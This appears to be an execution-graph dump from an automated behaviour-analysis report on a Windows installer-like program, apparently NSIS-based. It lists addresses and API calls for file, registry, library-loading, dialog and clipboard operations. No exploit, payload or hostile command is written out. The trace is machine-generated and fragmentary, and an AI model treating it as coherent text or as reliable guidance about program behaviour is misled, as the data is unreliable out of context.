                                                                                                                                                    execution_graph 4174 402fc0 4175 401446 18 API calls 4174->4175 4176 402fc7 4175->4176 4177 401a13 4176->4177 4178 403017 4176->4178 4179 40300a 4176->4179 4181 406831 18 API calls 4178->4181 4180 401446 18 API calls 4179->4180 4180->4177 4181->4177 4182 4023c1 4183 40145c 18 API calls 4182->4183 4184 4023c8 4183->4184 4187 407296 4184->4187 4190 406efe CreateFileW 4187->4190 4191 406f30 4190->4191 4192 406f4a ReadFile 4190->4192 4193 4062cf 11 API calls 4191->4193 4194 4023d6 4192->4194 4197 406fb0 4192->4197 4193->4194 4195 406fc7 ReadFile lstrcpynA lstrcmpA 4195->4197 4198 40700e SetFilePointer ReadFile 4195->4198 4196 40720f CloseHandle 4196->4194 4197->4194 4197->4195 4197->4196 4199 407009 4197->4199 4198->4196 4200 4070d4 ReadFile 4198->4200 4199->4196 4201 407164 4200->4201 4201->4199 4201->4200 4202 40718b SetFilePointer GlobalAlloc ReadFile 4201->4202 4203 4071eb lstrcpynW GlobalFree 4202->4203 4204 4071cf 4202->4204 4203->4196 4204->4203 4204->4204 4205 401cc3 4206 40145c 18 API calls 4205->4206 4207 401cca lstrlenW 4206->4207 4208 4030dc 4207->4208 4209 4030e3 4208->4209 4211 405f7d wsprintfW 4208->4211 4211->4209 4212 401c46 4213 40145c 18 API calls 4212->4213 4214 401c4c 4213->4214 4215 4062cf 11 API calls 4214->4215 4216 401c59 4215->4216 4217 406cc7 81 API calls 4216->4217 4218 401c64 4217->4218 4219 403049 4220 401446 18 API calls 4219->4220 4221 403050 4220->4221 4222 406831 18 API calls 4221->4222 4223 401a13 4221->4223 4222->4223 4224 40204a 4225 401446 18 API calls 4224->4225 4226 402051 IsWindow 4225->4226 4227 4018d3 4226->4227 4228 40324c 4229 403277 4228->4229 4230 40325e SetTimer 4228->4230 4231 4032cc 4229->4231 4232 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4229->4232 4230->4229 4232->4231 4233 4022cc 4234 40145c 18 API calls 4233->4234 4235 4022d3 4234->4235 4236 406301 2 API calls 4235->4236 4237 4022d9 4236->4237 4239 4022e8 4237->4239 4242 405f7d wsprintfW 4237->4242 4240 4030e3 4239->4240 4243 405f7d wsprintfW 4239->4243 4242->4239 4243->4240 4244 4030cf 4245 40145c 18 API calls 4244->4245 4246 4030d6 4245->4246 4248 4030dc 4246->4248 4251 4063d8 GlobalAlloc lstrlenW 4246->4251 4249 4030e3 4248->4249 4278 405f7d wsprintfW 4248->4278 4252 406460 4251->4252 4253 40640e 4251->4253 4252->4248 4254 40643b GetVersionExW 4253->4254 4279 406057 CharUpperW 4253->4279 4254->4252 4255 40646a 4254->4255 4256 406490 LoadLibraryA 4255->4256 4257 406479 4255->4257 4256->4252 4260 4064ae GetProcAddress GetProcAddress GetProcAddress 4256->4260 4257->4252 4259 4065b1 GlobalFree 4257->4259 4261 4065c7 LoadLibraryA 4259->4261 4262 406709 FreeLibrary 4259->4262 4263 406621 4260->4263 4267 4064d6 4260->4267 4261->4252 4265 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4261->4265 4262->4252 4264 40667d FreeLibrary 4263->4264 4266 406656 4263->4266 4264->4266 4265->4263 4270 406716 4266->4270 4275 4066b1 lstrcmpW 4266->4275 4276 4066e2 CloseHandle 4266->4276 4277 406700 CloseHandle 4266->4277 4267->4263 4268 406516 4267->4268 4269 4064fa FreeLibrary GlobalFree 4267->4269 4268->4259 4271 406528 lstrcpyW OpenProcess 4268->4271 4273 40657b CloseHandle CharUpperW lstrcmpW 4268->4273 4269->4252 4272 40671b CloseHandle FreeLibrary 4270->4272 4271->4268 4271->4273 4274 406730 CloseHandle 4272->4274 4273->4263 4273->4268 4274->4272 4275->4266 4275->4274 4276->4266 4277->4262 4278->4249 4279->4253 4280 4044d1 4281 40450b 4280->4281 4282 40453e 4280->4282 4348 405cb0 GetDlgItemTextW 4281->4348 4283 40454b GetDlgItem GetAsyncKeyState 4282->4283 4287 4045dd 4282->4287 4285 40456a GetDlgItem 4283->4285 4298 404588 4283->4298 4290 403d6b 19 API calls 4285->4290 4286 4046c9 4346 40485f 4286->4346 4350 405cb0 GetDlgItemTextW 4286->4350 4287->4286 4295 406831 18 API calls 4287->4295 4287->4346 4288 404516 4289 406064 5 API calls 4288->4289 4291 40451c 4289->4291 4293 40457d ShowWindow 4290->4293 4294 403ea0 5 API calls 4291->4294 4293->4298 4299 404521 GetDlgItem 4294->4299 4300 40465b SHBrowseForFolderW 4295->4300 4296 4046f5 4301 4067aa 18 API calls 4296->4301 4297 403df6 8 API calls 4302 404873 4297->4302 4303 4045a5 SetWindowTextW 4298->4303 4307 405d85 4 API calls 4298->4307 4304 40452f IsDlgButtonChecked 4299->4304 4299->4346 4300->4286 4306 404673 CoTaskMemFree 4300->4306 4311 4046fb 4301->4311 4305 403d6b 19 API calls 4303->4305 4304->4282 4309 4045c3 4305->4309 4310 40674e 3 API calls 4306->4310 4308 40459b 4307->4308 4308->4303 4315 40674e 3 API calls 4308->4315 4312 403d6b 19 API calls 4309->4312 4313 404680 4310->4313 4351 406035 lstrcpynW 4311->4351 4316 4045ce 4312->4316 4317 4046b7 SetDlgItemTextW 4313->4317 4322 406831 18 API calls 4313->4322 4315->4303 4349 403dc4 SendMessageW 4316->4349 4317->4286 4318 404712 4320 406328 3 API calls 4318->4320 4329 40471a 4320->4329 4321 4045d6 4323 406328 3 API calls 4321->4323 4324 40469f lstrcmpiW 4322->4324 4323->4287 4324->4317 4327 4046b0 lstrcatW 4324->4327 4325 40475c 4352 406035 lstrcpynW 4325->4352 4327->4317 4328 404765 4330 405d85 4 API calls 4328->4330 4329->4325 4333 40677d 2 API calls 4329->4333 4335 4047b1 4329->4335 4331 40476b GetDiskFreeSpaceW 4330->4331 4334 40478f MulDiv 4331->4334 4331->4335 4333->4329 4334->4335 4336 40480e 4335->4336 4353 4043d9 4335->4353 4337 404831 4336->4337 4339 40141d 80 API calls 4336->4339 4361 403db1 KiUserCallbackDispatcher 4337->4361 4339->4337 4340 4047ff 4342 404810 SetDlgItemTextW 4340->4342 4343 404804 4340->4343 4342->4336 4345 4043d9 21 API calls 4343->4345 4344 40484d 4344->4346 4362 403d8d 4344->4362 4345->4336 4346->4297 4348->4288 4349->4321 4350->4296 4351->4318 4352->4328 4354 4043f9 4353->4354 4355 406831 18 API calls 4354->4355 4356 404439 4355->4356 4357 406831 18 API calls 4356->4357 4358 404444 4357->4358 4359 406831 18 API calls 4358->4359 4360 404454 lstrlenW wsprintfW SetDlgItemTextW 4359->4360 4360->4340 4361->4344 4363 403da0 SendMessageW 4362->4363 4364 403d9b 4362->4364 4363->4346 4364->4363 4365 401dd3 4366 401446 18 API calls 4365->4366 4367 401dda 4366->4367 4368 401446 18 API calls 4367->4368 4369 4018d3 4368->4369 4370 402e55 4371 40145c 18 API calls 4370->4371 4372 402e63 4371->4372 4373 402e79 4372->4373 4374 40145c 18 API calls 4372->4374 4375 405e5c 2 API calls 4373->4375 4374->4373 4376 402e7f 4375->4376 4400 405e7c GetFileAttributesW CreateFileW 4376->4400 4378 402e8c 4379 402f35 4378->4379 4380 402e98 GlobalAlloc 4378->4380 4383 4062cf 11 API calls 4379->4383 4381 402eb1 4380->4381 4382 402f2c CloseHandle 4380->4382 4401 403368 SetFilePointer 4381->4401 4382->4379 4385 402f45 4383->4385 4387 402f50 DeleteFileW 4385->4387 4388 402f63 4385->4388 4386 402eb7 4389 403336 ReadFile 4386->4389 4387->4388 4402 401435 4388->4402 4391 402ec0 GlobalAlloc 4389->4391 4392 402ed0 4391->4392 4393 402f04 WriteFile GlobalFree 4391->4393 4395 40337f 33 API calls 4392->4395 4394 40337f 33 API calls 4393->4394 4396 402f29 4394->4396 4399 402edd 4395->4399 4396->4382 4398 402efb GlobalFree 4398->4393 4399->4398 4400->4378 4401->4386 4403 404f9e 25 API calls 4402->4403 4404 401443 4403->4404 4405 401cd5 4406 401446 18 API calls 4405->4406 4407 401cdd 4406->4407 4408 401446 18 API calls 4407->4408 4409 401ce8 4408->4409 4410 40145c 18 API calls 4409->4410 4411 401cf1 4410->4411 4412 401d07 lstrlenW 4411->4412 4413 401d43 4411->4413 4414 401d11 4412->4414 4414->4413 4418 406035 lstrcpynW 4414->4418 4416 401d2c 4416->4413 4417 401d39 lstrlenW 4416->4417 4417->4413 4418->4416 4419 402cd7 4420 401446 18 API calls 4419->4420 4422 402c64 4420->4422 4421 402d17 ReadFile 4421->4422 4422->4419 4422->4421 4423 402d99 4422->4423 4424 402dd8 4425 4030e3 4424->4425 4426 402ddf 4424->4426 4427 402de5 FindClose 4426->4427 4427->4425 4428 401d5c 4429 40145c 18 API calls 4428->4429 4430 401d63 4429->4430 4431 40145c 18 API calls 4430->4431 4432 401d6c 4431->4432 4433 401d73 lstrcmpiW 4432->4433 4434 401d86 lstrcmpW 4432->4434 4435 401d79 4433->4435 4434->4435 4436 401c99 4434->4436 4435->4434 4435->4436 4437 4027e3 4438 4027e9 4437->4438 4439 4027f2 4438->4439 4440 402836 4438->4440 4453 401553 4439->4453 4441 40145c 18 API calls 4440->4441 4443 40283d 4441->4443 4445 4062cf 11 API calls 4443->4445 4444 4027f9 4446 40145c 18 API calls 4444->4446 4450 401a13 4444->4450 4447 40284d 4445->4447 4448 40280a RegDeleteValueW 4446->4448 4457 40149d RegOpenKeyExW 4447->4457 4449 4062cf 11 API calls 4448->4449 4452 40282a RegCloseKey 4449->4452 4452->4450 4454 401563 4453->4454 4455 40145c 18 API calls 4454->4455 4456 401589 RegOpenKeyExW 4455->4456 4456->4444 4460 4014c9 4457->4460 4465 401515 4457->4465 4458 4014ef RegEnumKeyW 4459 401501 RegCloseKey 4458->4459 4458->4460 4462 406328 3 API calls 4459->4462 4460->4458 4460->4459 4461 401526 RegCloseKey 4460->4461 4463 40149d 3 API calls 4460->4463 4461->4465 4464 401511 4462->4464 4463->4460 4464->4465 4466 401541 RegDeleteKeyW 4464->4466 4465->4450 4466->4465 4467 4040e4 4468 4040ff 4467->4468 4474 40422d 4467->4474 4470 40413a 4468->4470 4498 403ff6 WideCharToMultiByte 4468->4498 4469 404298 4471 40436a 4469->4471 4472 4042a2 GetDlgItem 4469->4472 4478 403d6b 19 API calls 4470->4478 4479 403df6 8 API calls 4471->4479 4475 40432b 4472->4475 4476 4042bc 4472->4476 4474->4469 4474->4471 4477 404267 GetDlgItem SendMessageW 4474->4477 4475->4471 4480 40433d 4475->4480 4476->4475 4484 4042e2 6 API calls 4476->4484 4503 403db1 KiUserCallbackDispatcher 4477->4503 4482 40417a 4478->4482 4483 404365 4479->4483 4485 404353 4480->4485 4486 404343 SendMessageW 4480->4486 4488 403d6b 19 API calls 4482->4488 4484->4475 4485->4483 4489 404359 SendMessageW 4485->4489 4486->4485 4487 404293 4490 403d8d SendMessageW 4487->4490 4491 404187 CheckDlgButton 4488->4491 4489->4483 4490->4469 4501 403db1 KiUserCallbackDispatcher 4491->4501 4493 4041a5 GetDlgItem 4502 403dc4 SendMessageW 4493->4502 4495 4041bb SendMessageW 4496 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4495->4496 4497 4041d8 GetSysColor 4495->4497 4496->4483 4497->4496 4499 404033 4498->4499 4500 404015 GlobalAlloc WideCharToMultiByte 4498->4500 4499->4470 4500->4499 4501->4493 4502->4495 4503->4487 4504 402ae4 4505 402aeb 4504->4505 4506 4030e3 4504->4506 4507 402af2 CloseHandle 4505->4507 4507->4506 4508 402065 4509 401446 18 API calls 4508->4509 4510 40206d 4509->4510 4511 401446 18 API calls 4510->4511 4512 402076 GetDlgItem 4511->4512 4513 4030dc 4512->4513 4514 4030e3 4513->4514 4516 405f7d wsprintfW 4513->4516 4516->4514 4517 402665 4518 40145c 18 API calls 4517->4518 4519 40266b 4518->4519 4520 40145c 18 API calls 4519->4520 4521 402674 4520->4521 4522 40145c 18 API calls 4521->4522 4523 40267d 4522->4523 4524 4062cf 11 API calls 4523->4524 4525 40268c 4524->4525 4526 406301 2 API calls 4525->4526 4527 402695 4526->4527 4528 4026a6 lstrlenW lstrlenW 4527->4528 4530 404f9e 25 API calls 4527->4530 4532 4030e3 4527->4532 4529 404f9e 25 API calls 4528->4529 4531 4026e8 SHFileOperationW 4529->4531 4530->4527 4531->4527 4531->4532 4533 401c69 4534 40145c 18 API calls 4533->4534 4535 401c70 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 401c80 4536->4537 4538 405ccc MessageBoxIndirectW 4537->4538 4539 401a13 4538->4539 4540 402f6e 4541 402f72 4540->4541 4542 402fae 4540->4542 4544 4062cf 11 API calls 4541->4544 4543 40145c 18 API calls 4542->4543 4550 402f9d 4543->4550 4545 402f7d 4544->4545 4546 4062cf 11 API calls 4545->4546 4547 402f90 4546->4547 4548 402fa2 4547->4548 4549 402f98 4547->4549 4552 406113 9 API calls 4548->4552 4551 403ea0 5 API calls 4549->4551 4551->4550 4552->4550 4553 4023f0 4554 402403 4553->4554 4555 4024da 4553->4555 4556 40145c 18 API calls 4554->4556 4557 404f9e 25 API calls 4555->4557 4558 40240a 4556->4558 4561 4024f1 4557->4561 4559 40145c 18 API calls 4558->4559 4560 402413 4559->4560 4562 402429 LoadLibraryExW 4560->4562 4563 40241b GetModuleHandleW 4560->4563 4564 4024ce 4562->4564 4565 40243e 4562->4565 4563->4562 4563->4565 4567 404f9e 25 API calls 4564->4567 4577 406391 GlobalAlloc WideCharToMultiByte 4565->4577 4567->4555 4568 402449 4569 40248c 4568->4569 4570 40244f 4568->4570 4571 404f9e 25 API calls 4569->4571 4572 401435 25 API calls 4570->4572 4575 40245f 4570->4575 4573 402496 4571->4573 4572->4575 4574 4062cf 11 API calls 4573->4574 4574->4575 4575->4561 4576 4024c0 FreeLibrary 4575->4576 4576->4561 4578 4063c9 GlobalFree 4577->4578 4579 4063bc GetProcAddress 4577->4579 4578->4568 4579->4578 3416 402175 3426 401446 3416->3426 3418 40217c 3419 401446 18 API calls 3418->3419 3420 402186 3419->3420 3421 402197 3420->3421 3424 4062cf 11 API calls 3420->3424 3422 4021aa EnableWindow 3421->3422 3423 40219f ShowWindow 3421->3423 3425 4030e3 3422->3425 3423->3425 3424->3421 3427 406831 18 API calls 3426->3427 3428 401455 3427->3428 3428->3418 4580 4048f8 4581 404906 4580->4581 4582 40491d 4580->4582 4583 40490c 4581->4583 4598 404986 4581->4598 4584 40492b IsWindowVisible 4582->4584 4590 404942 4582->4590 4585 403ddb SendMessageW 4583->4585 4587 404938 4584->4587 4584->4598 4588 404916 4585->4588 4586 40498c CallWindowProcW 4586->4588 4599 40487a SendMessageW 4587->4599 4590->4586 4604 406035 lstrcpynW 4590->4604 4592 404971 4605 405f7d wsprintfW 4592->4605 4594 404978 4595 40141d 80 API calls 4594->4595 4596 40497f 4595->4596 4606 406035 lstrcpynW 4596->4606 4598->4586 4600 4048d7 SendMessageW 4599->4600 4601 40489d GetMessagePos ScreenToClient SendMessageW 4599->4601 4603 4048cf 4600->4603 4602 4048d4 4601->4602 4601->4603 4602->4600 4603->4590 4604->4592 4605->4594 4606->4598 3721 4050f9 3722 4052c1 3721->3722 3723 40511a GetDlgItem GetDlgItem GetDlgItem 3721->3723 3724 4052f2 3722->3724 3725 4052ca GetDlgItem CreateThread CloseHandle 3722->3725 3770 403dc4 SendMessageW 3723->3770 3727 405320 3724->3727 3729 405342 3724->3729 3730 40530c ShowWindow ShowWindow 3724->3730 3725->3724 3773 405073 OleInitialize 3725->3773 3731 40537e 3727->3731 3733 405331 3727->3733 3734 405357 ShowWindow 3727->3734 3728 40518e 3740 406831 18 API calls 3728->3740 3735 403df6 8 API calls 3729->3735 3772 403dc4 SendMessageW 3730->3772 3731->3729 3736 405389 SendMessageW 3731->3736 3737 403d44 SendMessageW 3733->3737 3738 405377 3734->3738 3739 405369 3734->3739 3745 4052ba 3735->3745 3744 4053a2 CreatePopupMenu 3736->3744 3736->3745 3737->3729 3743 403d44 SendMessageW 3738->3743 3741 404f9e 25 API calls 3739->3741 3742 4051ad 3740->3742 3741->3738 3746 4062cf 11 API calls 3742->3746 3743->3731 3747 406831 18 API calls 3744->3747 3748 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3746->3748 3749 4053b2 AppendMenuW 3747->3749 3750 405203 SendMessageW SendMessageW 3748->3750 3751 40521f 3748->3751 3752 4053c5 GetWindowRect 3749->3752 3753 4053d8 3749->3753 3750->3751 3754 405232 3751->3754 3755 405224 SendMessageW 3751->3755 3756 4053df TrackPopupMenu 3752->3756 3753->3756 3757 403d6b 19 API calls 3754->3757 3755->3754 3756->3745 3758 4053fd 3756->3758 3759 405242 3757->3759 3760 405419 SendMessageW 3758->3760 3761 40524b ShowWindow 3759->3761 3762 40527f GetDlgItem SendMessageW 3759->3762 3760->3760 3763 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3760->3763 3764 405261 ShowWindow 3761->3764 3765 40526e 3761->3765 3762->3745 3766 4052a2 SendMessageW SendMessageW 3762->3766 3767 40545b SendMessageW 3763->3767 3764->3765 3771 403dc4 SendMessageW 3765->3771 3766->3745 3767->3767 3768 405486 GlobalUnlock SetClipboardData CloseClipboard 3767->3768 3768->3745 3770->3728 3771->3762 3772->3727 3774 403ddb SendMessageW 3773->3774 3778 405096 3774->3778 3775 403ddb SendMessageW 3776 4050d1 OleUninitialize 3775->3776 3777 4062cf 11 API calls 3777->3778 3778->3777 3779 40139d 80 API calls 3778->3779 3780 4050c1 3778->3780 3779->3778 3780->3775 4607 4020f9 GetDC GetDeviceCaps 4608 401446 18 API calls 4607->4608 4609 402116 MulDiv 4608->4609 4610 401446 18 API calls 4609->4610 4611 40212c 4610->4611 4612 406831 18 API calls 4611->4612 4613 402165 CreateFontIndirectW 4612->4613 4614 4030dc 4613->4614 4615 4030e3 4614->4615 4617 405f7d wsprintfW 4614->4617 4617->4615 4618 4024fb 4619 40145c 18 API calls 4618->4619 4620 402502 4619->4620 4621 40145c 18 API calls 4620->4621 4622 40250c 4621->4622 4623 40145c 18 API calls 4622->4623 4624 402515 4623->4624 4625 40145c 18 API calls 4624->4625 4626 40251f 4625->4626 4627 40145c 18 API calls 4626->4627 4628 402529 4627->4628 4629 40253d 4628->4629 4630 40145c 18 API calls 4628->4630 4631 4062cf 11 API calls 4629->4631 4630->4629 4632 40256a CoCreateInstance 4631->4632 4633 40258c 4632->4633 4634 4026fc 4636 402708 4634->4636 4637 401ee4 4634->4637 4635 406831 18 API calls 4635->4637 4637->4634 4637->4635 3781 4019fd 3782 40145c 18 API calls 3781->3782 3783 401a04 3782->3783 3786 405eab 3783->3786 3787 405eb8 GetTickCount GetTempFileNameW 3786->3787 3788 401a0b 3787->3788 3789 405eee 3787->3789 3789->3787 3789->3788 4638 4022fd 4639 40145c 18 API calls 4638->4639 4640 402304 GetFileVersionInfoSizeW 4639->4640 4641 4030e3 4640->4641 4642 40232b GlobalAlloc 4640->4642 4642->4641 4643 40233f GetFileVersionInfoW 4642->4643 4644 402350 VerQueryValueW 4643->4644 4645 402381 GlobalFree 4643->4645 4644->4645 4646 402369 4644->4646 4645->4641 4651 405f7d wsprintfW 4646->4651 4649 402375 4652 405f7d wsprintfW 4649->4652 4651->4649 4652->4645 4653 402afd 4654 40145c 18 API calls 4653->4654 4655 402b04 4654->4655 4660 405e7c GetFileAttributesW CreateFileW 4655->4660 4657 402b10 4658 4030e3 4657->4658 4661 405f7d wsprintfW 4657->4661 4660->4657 4661->4658 4662 4029ff 4663 401553 19 API calls 4662->4663 4664 402a09 4663->4664 4665 40145c 18 API calls 4664->4665 4666 402a12 4665->4666 4667 402a1f RegQueryValueExW 4666->4667 4671 401a13 4666->4671 4668 402a45 4667->4668 4669 402a3f 4667->4669 4670 4029e4 RegCloseKey 4668->4670 4668->4671 4669->4668 4673 405f7d wsprintfW 4669->4673 4670->4671 4673->4668 4674 401000 4675 401037 BeginPaint GetClientRect 4674->4675 4676 40100c DefWindowProcW 4674->4676 4678 4010fc 4675->4678 4679 401182 4676->4679 4680 401073 CreateBrushIndirect FillRect DeleteObject 4678->4680 4681 401105 4678->4681 4680->4678 4682 401170 EndPaint 4681->4682 4683 40110b CreateFontIndirectW 4681->4683 4682->4679 4683->4682 4684 40111b 6 API calls 4683->4684 4684->4682 4685 401f80 4686 401446 18 API calls 4685->4686 4687 401f88 4686->4687 4688 401446 18 API calls 4687->4688 4689 401f93 4688->4689 4690 401fa3 4689->4690 4691 40145c 18 API calls 4689->4691 4692 401fb3 4690->4692 4693 40145c 18 API calls 4690->4693 4691->4690 4694 402006 4692->4694 4695 401fbc 4692->4695 4693->4692 4696 40145c 18 API calls 4694->4696 4697 401446 18 API calls 4695->4697 4698 40200d 4696->4698 4699 401fc4 4697->4699 4701 40145c 18 API calls 4698->4701 4700 401446 18 API calls 4699->4700 4702 401fce 4700->4702 4703 402016 FindWindowExW 4701->4703 4704 401ff6 SendMessageW 4702->4704 4705 401fd8 SendMessageTimeoutW 4702->4705 4707 402036 4703->4707 4704->4707 4705->4707 4706 4030e3 4707->4706 4709 405f7d wsprintfW 4707->4709 4709->4706 4710 402880 4711 402884 4710->4711 4712 40145c 18 API calls 4711->4712 4713 4028a7 4712->4713 4714 40145c 18 API calls 4713->4714 4715 4028b1 4714->4715 4716 4028ba RegCreateKeyExW 4715->4716 4717 4028e8 4716->4717 4722 4029ef 4716->4722 4718 402934 4717->4718 4720 40145c 18 API calls 4717->4720 4719 402963 4718->4719 4721 401446 18 API calls 4718->4721 4723 4029ae RegSetValueExW 4719->4723 4726 40337f 33 API calls 4719->4726 4724 4028fc lstrlenW 4720->4724 4725 402947 4721->4725 4729 4029c6 RegCloseKey 4723->4729 4730 4029cb 4723->4730 4727 402918 4724->4727 4728 40292a 4724->4728 4732 4062cf 11 API calls 4725->4732 4733 40297b 4726->4733 4734 4062cf 11 API calls 4727->4734 4735 4062cf 11 API calls 4728->4735 4729->4722 4731 4062cf 11 API calls 4730->4731 4731->4729 4732->4719 4741 406250 4733->4741 4738 402922 4734->4738 4735->4718 4738->4723 4740 4062cf 11 API calls 4740->4738 4742 406273 4741->4742 4743 4062b6 4742->4743 4744 406288 wsprintfW 4742->4744 4745 402991 4743->4745 4746 4062bf lstrcatW 4743->4746 4744->4743 4744->4744 4745->4740 4746->4745 4747 403d02 4748 403d0d 4747->4748 4749 403d11 4748->4749 4750 403d14 GlobalAlloc 4748->4750 4750->4749 4751 402082 4752 401446 18 API calls 4751->4752 4753 402093 SetWindowLongW 4752->4753 4754 4030e3 4753->4754 4755 402a84 4756 401553 19 API calls 4755->4756 4757 402a8e 4756->4757 4758 401446 18 API calls 4757->4758 4759 402a98 4758->4759 4760 401a13 4759->4760 4761 402ab2 RegEnumKeyW 4759->4761 4762 402abe RegEnumValueW 4759->4762 4763 402a7e 4761->4763 4762->4760 4762->4763 4763->4760 4764 4029e4 RegCloseKey 4763->4764 4764->4760 4765 402c8a 4766 402ca2 4765->4766 4767 402c8f 4765->4767 4769 40145c 18 API calls 4766->4769 4768 401446 18 API calls 4767->4768 4771 402c97 4768->4771 4770 402ca9 lstrlenW 4769->4770 4770->4771 4772 401a13 4771->4772 4773 402ccb WriteFile 4771->4773 4773->4772 4774 401d8e 4775 40145c 18 API calls 4774->4775 4776 401d95 ExpandEnvironmentStringsW 4775->4776 4777 401da8 4776->4777 4778 401db9 4776->4778 4777->4778 4779 401dad lstrcmpW 4777->4779 4779->4778 4780 401e0f 4781 401446 18 API calls 4780->4781 4782 401e17 4781->4782 4783 401446 18 API calls 4782->4783 4784 401e21 4783->4784 4785 4030e3 4784->4785 4787 405f7d wsprintfW 4784->4787 4787->4785 4788 40438f 4789 4043c8 4788->4789 4790 40439f 4788->4790 4791 403df6 8 API calls 4789->4791 4792 403d6b 19 API calls 4790->4792 4794 4043d4 4791->4794 4793 4043ac SetDlgItemTextW 4792->4793 4793->4789 4795 403f90 4796 403fa0 4795->4796 4797 403fbc 4795->4797 4806 405cb0 GetDlgItemTextW 4796->4806 4799 403fc2 SHGetPathFromIDListW 4797->4799 4800 403fef 4797->4800 4802 403fd2 4799->4802 4805 403fd9 SendMessageW 4799->4805 4801 403fad SendMessageW 4801->4797 4803 40141d 80 API calls 4802->4803 4803->4805 4805->4800 4806->4801 4807 402392 4808 40145c 18 API calls 4807->4808 4809 402399 4808->4809 4812 407224 4809->4812 4813 406efe 25 API calls 4812->4813 4814 407244 4813->4814 4815 4023a7 4814->4815 4816 40724e lstrcpynW lstrcmpW 4814->4816 4817 407280 4816->4817 4818 407286 lstrcpynW 4816->4818 4817->4818 4818->4815 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3402 406113 3360->3402 3379 40683e 3363->3379 3364 406aab 3365 401488 3364->3365 3397 406035 lstrcpynW 3364->3397 3365->3358 3381 406064 3365->3381 3367 4068ff GetVersion 3367->3379 3368 406a72 lstrlenW 3368->3379 3370 406831 10 API calls 3370->3368 3373 40697e GetSystemDirectoryW 3373->3379 3374 406064 5 API calls 3374->3379 3375 406991 GetWindowsDirectoryW 3375->3379 3376 406831 10 API calls 3376->3379 3377 406a0b lstrcatW 3377->3379 3378 4069c5 SHGetSpecialFolderLocation 3378->3379 3380 4069dd SHGetPathFromIDListW CoTaskMemFree 3378->3380 3379->3364 3379->3367 3379->3368 3379->3370 3379->3373 3379->3374 3379->3375 3379->3376 3379->3377 3379->3378 3390 405eff RegOpenKeyExW 3379->3390 3395 405f7d wsprintfW 3379->3395 3396 406035 lstrcpynW 3379->3396 3380->3379 3388 406071 3381->3388 3382 4060e7 3383 4060ed CharPrevW 3382->3383 3385 40610d 3382->3385 3383->3382 3384 4060da CharNextW 3384->3382 3384->3388 3385->3358 3387 4060c6 CharNextW 3387->3388 3388->3382 3388->3384 3388->3387 3389 4060d5 CharNextW 3388->3389 3398 405d32 3388->3398 3389->3384 3391 405f33 RegQueryValueExW 3390->3391 3392 405f78 3390->3392 3393 405f55 RegCloseKey 3391->3393 3392->3379 3393->3392 3395->3379 3396->3379 3397->3365 3399 405d38 3398->3399 3400 405d4e 3399->3400 3401 405d3f CharNextW 3399->3401 3400->3388 3401->3399 3403 40613c 3402->3403 3404 40611f 3402->3404 3406 4061b3 3403->3406 3407 406159 3403->3407 3408 40277f WritePrivateProfileStringW 3403->3408 3405 406129 CloseHandle 3404->3405 3404->3408 3405->3408 3406->3408 3409 4061bc lstrcatW lstrlenW WriteFile 3406->3409 3407->3409 3410 406162 GetFileAttributesW 3407->3410 3409->3408 3415 405e7c GetFileAttributesW CreateFileW 3410->3415 3412 40617e 3412->3408 3413 4061a8 SetFilePointer 3412->3413 3414 40618e WriteFile 3412->3414 3413->3406 3414->3413 3415->3412 4819 402797 4820 40145c 18 API calls 4819->4820 4821 4027ae 4820->4821 4822 40145c 18 API calls 4821->4822 4823 4027b7 4822->4823 4824 40145c 18 API calls 4823->4824 4825 4027c0 GetPrivateProfileStringW lstrcmpW 4824->4825 4826 401e9a 4827 40145c 18 API calls 4826->4827 4828 401ea1 4827->4828 4829 401446 18 API calls 4828->4829 4830 401eab wsprintfW 4829->4830 3790 401a1f 3791 40145c 18 API calls 3790->3791 3792 401a26 3791->3792 3793 4062cf 11 API calls 3792->3793 3794 401a49 3793->3794 3795 401a64 3794->3795 3796 401a5c 3794->3796 3865 406035 lstrcpynW 3795->3865 3864 406035 lstrcpynW 3796->3864 3799 401a6f 3866 40674e lstrlenW CharPrevW 3799->3866 3800 401a62 3803 406064 5 API calls 3800->3803 3834 401a81 3803->3834 3804 406301 2 API calls 3804->3834 3807 401a98 CompareFileTime 3807->3834 3808 401ba9 3809 404f9e 25 API calls 3808->3809 3811 401bb3 3809->3811 3810 401b5d 3812 404f9e 25 API calls 3810->3812 3843 40337f 3811->3843 3814 401b70 3812->3814 3818 4062cf 11 API calls 3814->3818 3816 406035 lstrcpynW 3816->3834 3817 4062cf 11 API calls 3819 401bda 3817->3819 3823 401b8b 3818->3823 3820 401be9 SetFileTime 3819->3820 3821 401bf8 CloseHandle 3819->3821 3820->3821 3821->3823 3824 401c09 3821->3824 3822 406831 18 API calls 3822->3834 3825 401c21 3824->3825 3826 401c0e 3824->3826 3827 406831 18 API calls 3825->3827 3828 406831 18 API calls 3826->3828 3829 401c29 3827->3829 3831 401c16 lstrcatW 3828->3831 3832 4062cf 11 API calls 3829->3832 3831->3829 3835 401c34 3832->3835 3833 401b50 3837 401b93 3833->3837 3838 401b53 3833->3838 3834->3804 3834->3807 3834->3808 3834->3810 3834->3816 3834->3822 3834->3833 3836 4062cf 11 API calls 3834->3836 3842 405e7c GetFileAttributesW CreateFileW 3834->3842 3869 405e5c GetFileAttributesW 3834->3869 3872 405ccc 3834->3872 3839 405ccc MessageBoxIndirectW 3835->3839 3836->3834 3840 4062cf 11 API calls 3837->3840 3841 4062cf 11 API calls 3838->3841 3839->3823 3840->3823 3841->3810 3842->3834 3844 40339a 3843->3844 3845 4033c7 3844->3845 3878 403368 SetFilePointer 3844->3878 3876 403336 ReadFile 3845->3876 3849 401bc6 3849->3817 3850 403546 3852 40354a 3850->3852 3853 40356e 3850->3853 3851 4033eb GetTickCount 3851->3849 3856 403438 3851->3856 3854 403336 ReadFile 3852->3854 3853->3849 3857 403336 ReadFile 3853->3857 3858 40358d WriteFile 